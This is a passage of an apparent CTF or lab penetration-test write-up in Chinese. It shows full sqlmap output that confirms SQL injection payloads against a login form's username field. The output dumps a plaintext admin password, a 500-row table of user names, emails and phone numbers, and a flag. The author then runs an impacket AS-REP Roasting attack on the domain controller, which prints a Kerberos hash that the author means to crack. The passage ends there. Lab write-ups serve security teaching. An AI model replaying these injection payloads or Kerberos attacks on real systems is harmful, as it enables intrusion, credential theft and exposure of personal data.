[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:09:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:09:47] [INFO] testing 'Generic inline queries'  ...  172.22.6.38:80 
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:09:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:09:50] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:10:00] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:10:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:10:21] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[02:10:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[02:10:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:10:42] [INFO] target URL appears to be UNION injectable with 3 columns
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:10:43] [WARNING] reflective value(s) found and filtering out6.38:80 
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:10:52] [INFO] POST parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 70 HTTP(s) requests:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 8912 FROM (SELECT(SLEEP(5)))UejQ) AND 'ioQk'='ioQk&password=123

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: username=admin' UNION ALL SELECT NULL,CONCAT(0x7162767071,0x5473526c4649526472784b6d455a555743756f76764850586f42736b4c48757a4f74527558644e45,0x71716b6271),NULL-- -&password=123
---
[02:10:55] [INFO] the back-end DBMS is MySQL
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  OK
 ...  172.22.6.38:80  ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  OK
 ...  172.22.6.38:80  ...  OK
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[02:11:03] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[02:11:03] [INFO] fetching current database
[02:11:03] [INFO] fetching tables for database: 'oa_db'  172.22.6.38:80 
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:11:04] [INFO] fetching columns for table 'oa_admin' in database 'oa_db'
[02:11:04] [INFO] fetching entries for table 'oa_admin' in database 'oa_db'
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
Database: oa_db
Table: oa_admin
[1 entry]
+----+------------------+---------------+
| id | password         | username      |
+----+------------------+---------------+
| 1  | bo2y8kAL3HnXUiQo | administrator |
+----+------------------+---------------+

[02:11:07] [INFO] table 'oa_db.oa_admin' dumped to CSV file '/root/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_admin.csv'
[02:11:07] [INFO] fetching columns for table 'oa_users' in database 'oa_db'
[02:11:08] [INFO] fetching entries for table 'oa_users' in database 'oa_db'
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:11:09] [WARNING] console output will be trimmed to last 256 rows due to large table size
Database: oa_db
Table: oa_users
[500 entries]
+-----+----------------------------+-------------+-----------------+
| id  | email                      | phone       | username        |
+-----+----------------------------+-------------+-----------------+
 ...
| 245 | chenyan@xiaorang.lab       | 18281528743 | CHEN YAN        |
| 246 | tanggui@xiaorang.lab       | 18060615547 | TANG GUI        |
| 247 | buning@xiaorang.lab        | 13046481392 | BU NING         |
| 248 | beishu@xiaorang.lab        | 18268508400 | BEI SHU         |
| 249 | shushi@xiaorang.lab        | 17770383196 | SHU SHI         |
| 250 | fuyi@xiaorang.lab          | 18902082658 | FU YI           |
| 251 | pangcheng@xiaorang.lab     | 18823789530 | PANG CHENG      |
| 252 | tonghao@xiaorang.lab       | 13370873526 | TONG HAO        |
| 253 | jiaoshan@xiaorang.lab      | 15375905173 | JIAO SHAN       |
| 254 | dulun@xiaorang.lab         | 13352331157 | DU LUN          |
| 255 | kejuan@xiaorang.lab        | 13222550481 | KE JUAN         |
| 256 | gexin@xiaorang.lab         | 18181553086 | GE XIN          |
| 257 | lugu@xiaorang.lab          | 18793883130 | LU GU           |
| 258 | guzaicheng@xiaorang.lab    | 15309377043 | GU ZAI CHENG    |
| 259 | feicai@xiaorang.lab        | 13077435367 | FEI CAI         |
| 260 | ranqun@xiaorang.lab        | 18239164662 | RAN QUN         |
| 261 | zhouyi@xiaorang.lab        | 13169264671 | ZHOU YI         |
| 262 | shishu@xiaorang.lab        | 18592890189 | SHI SHU         |
| 263 | yanyun@xiaorang.lab        | 15071085768 | YAN YUN         |
| 264 | chengqiu@xiaorang.lab      | 13370162980 | CHENG QIU       |
| 265 | louyou@xiaorang.lab        | 13593582379 | LOU YOU         |
| 266 | maqun@xiaorang.lab         | 15235945624 | MA QUN          |
| 267 | wenbiao@xiaorang.lab       | 13620643639 | WEN BIAO        |
| 268 | weishengshan@xiaorang.lab  | 18670502260 | WEI SHENG SHAN  |
| 269 | zhangxin@xiaorang.lab      | 15763185760 | ZHANG XIN       |
| 270 | chuyuan@xiaorang.lab       | 18420545268 | CHU YUAN        |
| 271 | wenliang@xiaorang.lab      | 13601678032 | WEN LIANG       |
| 272 | yulvxue@xiaorang.lab       | 18304374901 | YU LV XUE       |
| 273 | luyue@xiaorang.lab         | 18299785575 | LU YUE          |
| 274 | ganjian@xiaorang.lab       | 18906111021 | GAN JIAN        |
| 275 | pangzhen@xiaorang.lab      | 13479328562 | PANG ZHEN       |
| 276 | guohong@xiaorang.lab       | 18510220597 | GUO HONG        |
| 277 | lezhong@xiaorang.lab       | 15320909285 | LE ZHONG        |
| 278 | sheweiyue@xiaorang.lab     | 13736399596 | SHE WEI YUE     |
| 279 | dujian@xiaorang.lab        | 15058892639 | DU JIAN         |
| 280 | lidongjin@xiaorang.lab     | 18447207007 | LI DONG JIN     |
| 281 | hongqun@xiaorang.lab       | 15858462251 | HONG QUN        |
| 282 | yexing@xiaorang.lab        | 13719043564 | YE XING         |
| 283 | maoda@xiaorang.lab         | 13878840690 | MAO DA          |
| 284 | qiaomei@xiaorang.lab       | 13053207462 | QIAO MEI        |
| 285 | nongzhen@xiaorang.lab      | 15227699960 | NONG ZHEN       |
| 286 | dongshu@xiaorang.lab       | 15695562947 | DONG SHU        |
| 287 | zhuzhu@xiaorang.lab        | 13070163385 | ZHU ZHU         |
| 288 | jiyun@xiaorang.lab         | 13987332999 | JI YUN          |
| 289 | qiguanrou@xiaorang.lab     | 15605983582 | QI GUAN ROU     |
| 290 | yixue@xiaorang.lab         | 18451603140 | YI XUE          |
| 291 | chujun@xiaorang.lab        | 15854942459 | CHU JUN         |
| 292 | shenshan@xiaorang.lab      | 17712052191 | SHEN SHAN       |
| 293 | lefen@xiaorang.lab         | 13271196544 | LE FEN          |
| 294 | yubo@xiaorang.lab          | 13462202742 | YU BO           |
| 295 | helianrui@xiaorang.lab     | 15383000907 | HE LIAN RUI     |
| 296 | xuanqun@xiaorang.lab       | 18843916267 | XUAN QUN        |
| 297 | shangjun@xiaorang.lab      | 15162486698 | SHANG JUN       |
| 298 | huguang@xiaorang.lab       | 18100586324 | HU GUANG        |
| 299 | wansifu@xiaorang.lab       | 18494761349 | WAN SI FU       |
| 300 | fenghong@xiaorang.lab      | 13536727314 | FENG HONG       |
| 301 | wanyan@xiaorang.lab        | 17890844429 | WAN YAN         |
| 302 | diyan@xiaorang.lab         | 18534028047 | DI YAN          |
| 303 | xiangyu@xiaorang.lab       | 13834043047 | XIANG YU        |
| 304 | songyan@xiaorang.lab       | 15282433280 | SONG YAN        |
| 305 | fandi@xiaorang.lab         | 15846960039 | FAN DI          |
| 306 | xiangjuan@xiaorang.lab     | 18120327434 | XIANG JUAN      |
| 307 | beirui@xiaorang.lab        | 18908661803 | BEI RUI         |
| 308 | didi@xiaorang.lab          | 13413041463 | DI DI           |
| 309 | zhubin@xiaorang.lab        | 15909558554 | ZHU BIN         |
| 310 | lingchun@xiaorang.lab      | 13022790678 | LING CHUN       |
| 311 | zhenglu@xiaorang.lab       | 13248244873 | ZHENG LU        |
| 312 | xundi@xiaorang.lab         | 18358493414 | XUN DI          |
| 313 | wansishun@xiaorang.lab     | 18985028319 | WAN SI SHUN     |
| 314 | yezongyue@xiaorang.lab     | 13866302416 | YE ZONG YUE     |
| 315 | bianmei@xiaorang.lab       | 18540879992 | BIAN MEI        |
| 316 | shanshao@xiaorang.lab      | 18791488918 | SHAN SHAO       |
| 317 | zhenhui@xiaorang.lab       | 13736784817 | ZHEN HUI        |
| 318 | chengli@xiaorang.lab       | 15913267394 | CHENG LI        |
| 319 | yufen@xiaorang.lab         | 18432795588 | YU FEN          |
| 320 | jiyi@xiaorang.lab          | 13574211454 | JI YI           |
| 321 | panbao@xiaorang.lab        | 13675851303 | PAN BAO         |
| 322 | mennane@xiaorang.lab       | 15629706208 | MEN NAN E       |
| 323 | fengsi@xiaorang.lab        | 13333432577 | FENG SI         |
| 324 | mingyan@xiaorang.lab       | 18296909463 | MING YAN        |
| 325 | luoyou@xiaorang.lab        | 15759321415 | LUO YOU         |
| 326 | liangduanqing@xiaorang.lab | 13150744785 | LIANG DUAN QING |
| 327 | nongyan@xiaorang.lab       | 18097386975 | NONG YAN        |
| 328 | haolun@xiaorang.lab        | 15152700465 | HAO LUN         |
| 329 | oulun@xiaorang.lab         | 13402760696 | OU LUN          |
| 330 | weichipeng@xiaorang.lab    | 18057058937 | WEI CHI PENG    |
| 331 | qidiaofang@xiaorang.lab    | 18728297829 | QI DIAO FANG    |
| 332 | xuehe@xiaorang.lab         | 13398862169 | XUE HE          |
| 333 | chensi@xiaorang.lab        | 18030178713 | CHEN SI         |
| 334 | guihui@xiaorang.lab        | 17882514129 | GUI HUI         |
| 335 | fuyue@xiaorang.lab         | 18298436549 | FU YUE          |
| 336 | wangxing@xiaorang.lab      | 17763645267 | WANG XING       |
| 337 | zhengxiao@xiaorang.lab     | 18673968392 | ZHENG XIAO      |
| 338 | guhui@xiaorang.lab         | 15166711352 | GU HUI          |
| 339 | baoai@xiaorang.lab         | 15837430827 | BAO AI          |
| 340 | hangzhao@xiaorang.lab      | 13235488232 | HANG ZHAO       |
| 341 | xingye@xiaorang.lab        | 13367587521 | XING YE         |
| 342 | qianyi@xiaorang.lab        | 18657807767 | QIAN YI         |
| 343 | xionghong@xiaorang.lab     | 17725874584 | XIONG HONG      |
| 344 | zouqi@xiaorang.lab         | 15300430128 | ZOU QI          |
| 345 | rongbiao@xiaorang.lab      | 13034242682 | RONG BIAO       |
| 346 | gongxin@xiaorang.lab       | 15595839880 | GONG XIN        |
| 347 | luxing@xiaorang.lab        | 18318675030 | LU XING         |
| 348 | huayan@xiaorang.lab        | 13011805354 | HUA YAN         |
| 349 | duyue@xiaorang.lab         | 15515878208 | DU YUE          |
| 350 | xijun@xiaorang.lab         | 17871583183 | XI JUN          |
| 351 | daiqing@xiaorang.lab       | 18033226216 | DAI QING        |
| 352 | yingbiao@xiaorang.lab      | 18633421863 | YING BIAO       |
| 353 | hengteng@xiaorang.lab      | 15956780740 | HENG TENG       |
| 354 | changwu@xiaorang.lab       | 15251485251 | CHANG WU        |
| 355 | chengying@xiaorang.lab     | 18788248715 | CHENG YING      |
| 356 | luhong@xiaorang.lab        | 17766091079 | LU HONG         |
| 357 | tongxue@xiaorang.lab       | 18466102780 | TONG XUE        |
| 358 | xiangqian@xiaorang.lab     | 13279611385 | XIANG QIAN      |
| 359 | shaokang@xiaorang.lab      | 18042645434 | SHAO KANG       |
| 360 | nongzhu@xiaorang.lab       | 13934236634 | NONG ZHU        |
| 361 | haomei@xiaorang.lab        | 13406913218 | HAO MEI         |
| 362 | maoqing@xiaorang.lab       | 15713298425 | MAO QING        |
| 363 | xiai@xiaorang.lab          | 18148404789 | XI AI           |
| 364 | bihe@xiaorang.lab          | 13628593791 | BI HE           |
| 365 | gaoli@xiaorang.lab         | 15814408188 | GAO LI          |
| 366 | jianggong@xiaorang.lab     | 15951118926 | JIANG GONG      |
| 367 | pangning@xiaorang.lab      | 13443921700 | PANG NING       |
| 368 | ruishi@xiaorang.lab        | 15803112819 | RUI SHI         |
| 369 | wuhuan@xiaorang.lab        | 13646953078 | WU HUAN         |
| 370 | qiaode@xiaorang.lab        | 13543564200 | QIAO DE         |
| 371 | mayong@xiaorang.lab        | 15622971484 | MA YONG         |
| 372 | hangda@xiaorang.lab        | 15937701659 | HANG DA         |
| 373 | changlu@xiaorang.lab       | 13734991654 | CHANG LU        |
| 374 | liuyuan@xiaorang.lab       | 15862054540 | LIU YUAN        |
| 375 | chenggu@xiaorang.lab       | 15706685526 | CHENG GU        |
| 376 | shentuyun@xiaorang.lab     | 15816902379 | SHEN TU YUN     |
| 377 | zhuangsong@xiaorang.lab    | 17810274262 | ZHUANG SONG     |
| 378 | chushao@xiaorang.lab       | 18822001640 | CHU SHAO        |
| 379 | heli@xiaorang.lab          | 13701347081 | HE LI           |
| 380 | haoming@xiaorang.lab       | 15049615282 | HAO MING        |
| 381 | xieyi@xiaorang.lab         | 17840660107 | XIE YI          |
| 382 | shangjie@xiaorang.lab      | 15025010410 | SHANG JIE       |
| 383 | situxin@xiaorang.lab       | 18999728941 | SI TU XIN       |
| 384 | linxi@xiaorang.lab         | 18052976097 | LIN XI          |
| 385 | zoufu@xiaorang.lab         | 15264535633 | ZOU FU          |
| 386 | qianqing@xiaorang.lab      | 18668594658 | QIAN QING       |
| 387 | qiai@xiaorang.lab          | 18154690198 | QI AI           |
| 388 | ruilin@xiaorang.lab        | 13654483014 | RUI LIN         |
| 389 | luomeng@xiaorang.lab       | 15867095032 | LUO MENG        |
| 390 | huaren@xiaorang.lab        | 13307653720 | HUA REN         |
| 391 | yanyangmei@xiaorang.lab    | 15514015453 | YAN YANG MEI    |
| 392 | zuofen@xiaorang.lab        | 15937087078 | ZUO FEN         |
| 393 | manyuan@xiaorang.lab       | 18316106061 | MAN YUAN        |
| 394 | yuhui@xiaorang.lab         | 18058257228 | YU HUI          |
| 395 | sunli@xiaorang.lab         | 18233801124 | SUN LI          |
| 396 | guansixin@xiaorang.lab     | 13607387740 | GUAN SI XIN     |
| 397 | ruisong@xiaorang.lab       | 13306021674 | RUI SONG        |
| 398 | qiruo@xiaorang.lab         | 13257810331 | QI RUO          |
| 399 | jinyu@xiaorang.lab         | 18565922652 | JIN YU          |
| 400 | shoujuan@xiaorang.lab      | 18512174415 | SHOU JUAN       |
| 401 | yanqian@xiaorang.lab       | 13799789435 | YAN QIAN        |
| 402 | changyun@xiaorang.lab      | 18925015029 | CHANG YUN       |
| 403 | hualu@xiaorang.lab         | 13641470801 | HUA LU          |
| 404 | huanming@xiaorang.lab      | 15903282860 | HUAN MING       |
| 405 | baoshao@xiaorang.lab       | 13795275611 | BAO SHAO        |
| 406 | hongmei@xiaorang.lab       | 13243605925 | HONG MEI        |
| 407 | manyun@xiaorang.lab        | 13238107359 | MAN YUN         |
| 408 | changwan@xiaorang.lab      | 13642205622 | CHANG WAN       |
| 409 | wangyan@xiaorang.lab       | 13242486231 | WANG YAN        |
| 410 | shijian@xiaorang.lab       | 15515077573 | SHI JIAN        |
| 411 | ruibei@xiaorang.lab        | 18157706586 | RUI BEI         |
| 412 | jingshao@xiaorang.lab      | 18858376544 | JING SHAO       |
| 413 | jinzhi@xiaorang.lab        | 18902437082 | JIN ZHI         |
| 414 | yuhui@xiaorang.lab         | 15215599294 | YU HUI          |
| 415 | zangpeng@xiaorang.lab      | 18567574150 | ZANG PENG       |
| 416 | changyun@xiaorang.lab      | 15804640736 | CHANG YUN       |
| 417 | yetai@xiaorang.lab         | 13400150018 | YE TAI          |
| 418 | luoxue@xiaorang.lab        | 18962643265 | LUO XUE         |
| 419 | moqian@xiaorang.lab        | 18042706956 | MO QIAN         |
| 420 | xupeng@xiaorang.lab        | 15881934759 | XU PENG         |
| 421 | ruanyong@xiaorang.lab      | 15049703903 | RUAN YONG       |
| 422 | guliangxian@xiaorang.lab   | 18674282714 | GU LIANG XIAN   |
| 423 | yinbin@xiaorang.lab        | 15734030492 | YIN BIN         |
| 424 | huarui@xiaorang.lab        | 17699257041 | HUA RUI         |
| 425 | niuya@xiaorang.lab         | 13915041589 | NIU YA          |
| 426 | guwei@xiaorang.lab         | 13584571917 | GU WEI          |
| 427 | qinguan@xiaorang.lab       | 18427953434 | QIN GUAN        |
| 428 | yangdanhan@xiaorang.lab    | 15215900100 | YANG DAN HAN    |
| 429 | yingjun@xiaorang.lab       | 13383367818 | YING JUN        |
| 430 | weiwan@xiaorang.lab        | 13132069353 | WEI WAN         |
| 431 | sunduangu@xiaorang.lab     | 15737981701 | SUN DUAN GU     |
| 432 | sisiwu@xiaorang.lab        | 18021600640 | SI SI WU        |
| 433 | nongyan@xiaorang.lab       | 13312613990 | NONG YAN        |
| 434 | xuanlu@xiaorang.lab        | 13005748230 | XUAN LU         |
| 435 | yunzhong@xiaorang.lab      | 15326746780 | YUN ZHONG       |
| 436 | gengfei@xiaorang.lab       | 13905027813 | GENG FEI        |
| 437 | zizhuansong@xiaorang.lab   | 13159301262 | ZI ZHUAN SONG   |
| 438 | ganbailong@xiaorang.lab    | 18353612904 | GAN BAI LONG    |
| 439 | shenjiao@xiaorang.lab      | 15164719751 | SHEN JIAO       |
| 440 | zangyao@xiaorang.lab       | 18707028470 | ZANG YAO        |
| 441 | yangdanhe@xiaorang.lab     | 18684281105 | YANG DAN HE     |
| 442 | chengliang@xiaorang.lab    | 13314617161 | CHENG LIANG     |
| 443 | xudi@xiaorang.lab          | 18498838233 | XU DI           |
| 444 | wulun@xiaorang.lab         | 18350490780 | WU LUN          |
| 445 | yuling@xiaorang.lab        | 18835870616 | YU LING         |
| 446 | taoya@xiaorang.lab         | 18494928860 | TAO YA          |
| 447 | jinle@xiaorang.lab         | 15329208123 | JIN LE          |
| 448 | youchao@xiaorang.lab       | 13332964189 | YOU CHAO        |
| 449 | liangduanzhi@xiaorang.lab  | 15675237494 | LIANG DUAN ZHI  |
| 450 | jiagupiao@xiaorang.lab     | 17884962455 | JIA GU PIAO     |
| 451 | ganze@xiaorang.lab         | 17753508925 | GAN ZE          |
| 452 | jiangqing@xiaorang.lab     | 15802357200 | JIANG QING      |
| 453 | jinshan@xiaorang.lab       | 13831466303 | JIN SHAN        |
| 454 | zhengpubei@xiaorang.lab    | 13690156563 | ZHENG PU BEI    |
| 455 | cuicheng@xiaorang.lab      | 17641589842 | CUI CHENG       |
| 456 | qiyong@xiaorang.lab        | 13485427829 | QI YONG         |
| 457 | qizhu@xiaorang.lab         | 18838859844 | QI ZHU          |
| 458 | ganjian@xiaorang.lab       | 18092585003 | GAN JIAN        |
| 459 | yurui@xiaorang.lab         | 15764121637 | YU RUI          |
| 460 | feishu@xiaorang.lab        | 18471512248 | FEI SHU         |
| 461 | chenxin@xiaorang.lab       | 13906545512 | CHEN XIN        |
| 462 | shengzhe@xiaorang.lab      | 18936457394 | SHENG ZHE       |
| 463 | wohong@xiaorang.lab        | 18404022650 | WO HONG         |
| 464 | manzhi@xiaorang.lab        | 15973350408 | MAN ZHI         |
| 465 | xiangdong@xiaorang.lab     | 13233908989 | XIANG DONG      |
| 466 | weihui@xiaorang.lab        | 15035834945 | WEI HUI         |
| 467 | xingquan@xiaorang.lab      | 18304752969 | XING QUAN       |
| 468 | miaoshu@xiaorang.lab       | 15121570939 | MIAO SHU        |
| 469 | gongwan@xiaorang.lab       | 18233990398 | GONG WAN        |
| 470 | qijie@xiaorang.lab         | 15631483536 | QI JIE          |
| 471 | shaoting@xiaorang.lab      | 15971628914 | SHAO TING       |
| 472 | xiqi@xiaorang.lab          | 18938747522 | XI QI           |
| 473 | jinghong@xiaorang.lab      | 18168293686 | JING HONG       |
| 474 | qianyou@xiaorang.lab       | 18841322688 | QIAN YOU        |
| 475 | chuhua@xiaorang.lab        | 15819380754 | CHU HUA         |
| 476 | yanyue@xiaorang.lab        | 18702474361 | YAN YUE         |
| 477 | huangjia@xiaorang.lab      | 13006878166 | HUANG JIA       |
| 478 | zhouchun@xiaorang.lab      | 13545820679 | ZHOU CHUN       |
| 479 | jiyu@xiaorang.lab          | 18650881187 | JI YU           |
| 480 | wendong@xiaorang.lab       | 17815264093 | WEN DONG        |
| 481 | heyuan@xiaorang.lab        | 18710821773 | HE YUAN         |
| 482 | mazhen@xiaorang.lab        | 18698248638 | MA ZHEN         |
| 483 | shouchun@xiaorang.lab      | 15241369178 | SHOU CHUN       |
| 484 | liuzhe@xiaorang.lab        | 18530936084 | LIU ZHE         |
| 485 | fengbo@xiaorang.lab        | 15812110254 | FENG BO         |
| 486 | taigongyuan@xiaorang.lab   | 15943349034 | TAI GONG YUAN   |
| 487 | gesheng@xiaorang.lab       | 18278508909 | GE SHENG        |
| 488 | songming@xiaorang.lab      | 13220512663 | SONG MING       |
| 489 | yuwan@xiaorang.lab         | 15505678035 | YU WAN          |
| 490 | diaowei@xiaorang.lab       | 13052582975 | DIAO WEI        |
| 491 | youyi@xiaorang.lab         | 18036808394 | YOU YI          |
| 492 | rongxianyu@xiaorang.lab    | 18839918955 | RONG XIAN YU    |
| 493 | fuyi@xiaorang.lab          | 15632151678 | FU YI           |
| 494 | linli@xiaorang.lab         | 17883399275 | LIN LI          |
| 495 | weixue@xiaorang.lab        | 18672465853 | WEI XUE         |
| 496 | hejuan@xiaorang.lab        | 13256081102 | HE JUAN         |
| 497 | zuoqiutai@xiaorang.lab     | 18093001354 | ZUO QIU TAI     |
| 498 | siyi@xiaorang.lab          | 17873307773 | SI YI           |
| 499 | shenshan@xiaorang.lab      | 18397560369 | SHEN SHAN       |
| 500 | tongdong@xiaorang.lab      | 15177549595 | TONG DONG       |
+-----+----------------------------+-------------+-----------------+

[02:11:09] [INFO] table 'oa_db.oa_users' dumped to CSV file '/root/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_users.csv'
[02:11:09] [INFO] fetching columns for table 'oa_f1Agggg' in database 'oa_db'
[02:11:09] [INFO] fetching entries for table 'oa_f1Agggg' in database 'oa_db'
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
Database: oa_db
Table: oa_f1Agggg
[1 entry]
+----+--------------------------------------------+
| id | flag02                                     |
+----+--------------------------------------------+
| 1  | flag{b142f5ce-d9b8-4b73-9012-ad75175ba029} |
+----+--------------------------------------------+

[02:11:10] [INFO] table 'oa_db.oa_f1Agggg' dumped to CSV file '/root/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_f1Agggg.csv'
[02:11:10] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.22.6.38'

[*] ending @ 02:11:10 /2026-02-21/

顺利拿到flag02.

现在的目标应该是172.22.6.25,12是域控。

用刚刚sqlmap注出来的用户名处理一下,做成字典,打AS-REP Roasting攻击

1
2
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# proxychains4 impacket-GetNPUsers -usersfile users.txt -no-pass -dc-ip 172.22.6.12 xiaorang.lab/
1
2
3
[-] User weishengshan doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.12:88  ...  OK
$krb5asrep$23$zhangxin@XIAORANG.LAB:3ff52ceb3c117bcf7e39e29a56ee4a20$c7b6c7c1155f5774978a46d50a9ca3fd44642effcac658f6323a7d39c26d559cf21ed5e37208df2af683362508c089e875a76cfad067181583a8404e1cecaac2c2d924e6075ad70b575389a93804df8edae1ec662712da703d594ed16dcc338f90b53b93d6c194816ceb29c1ed7bf88987e0804899bdd205f439ecec51e248418715eaa6af4e730f617e07d2ec4dd54f1774742ec8014add78bee555b46cadb45670ca29f6c94771005443b383b170840e79718b025cc78110e6907748a92309c1d03ce8e79dab15e62f0a8e06f293c39fa2731cd04f7a5ce6ecc299c1df587dcb5b37fcca5e42bc675b74e7

找到了zhangxin的哈希

爆破一下

1
